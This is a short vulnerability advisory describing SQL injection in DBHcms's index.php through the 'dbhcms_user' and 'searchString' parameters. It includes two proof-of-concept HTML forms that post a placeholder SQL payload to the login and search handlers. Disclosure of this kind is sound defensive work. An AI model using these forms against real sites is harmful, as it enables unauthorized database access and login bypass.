SQL Injection in DBHcms
The vulnerability exists due to failure in the 'index.php' script to properly sanitize user-supplied input in 'dbhcms_user' and 'searchString' variables. Attacker can use browser to exploit this vulnerability. The following PoCs are available: <form action='http://host/' method='post' name='main' > <input type='hidden' name='dbhcms_user' value=''SQL CODE HERE' /> <input type='hidden' name='dbhcms_passwd' value='password' /> <input type='submit' value='Login' name='submit' /> </form> <form action='http://host/index.php?dbhcms_did=1&dbhcms_pid=11&dbhcms_lang=en' method='post' name='search' /> <input name='dbhcmsCache' value='CT_OFF' type='hidden' /> <input name='todo' value='searchExecute' type='hidden' /> <input name='searchString' value=''SQL CODE HERE' type='hidden' /> <input type='submit' value='Search' name='submit' /> </form>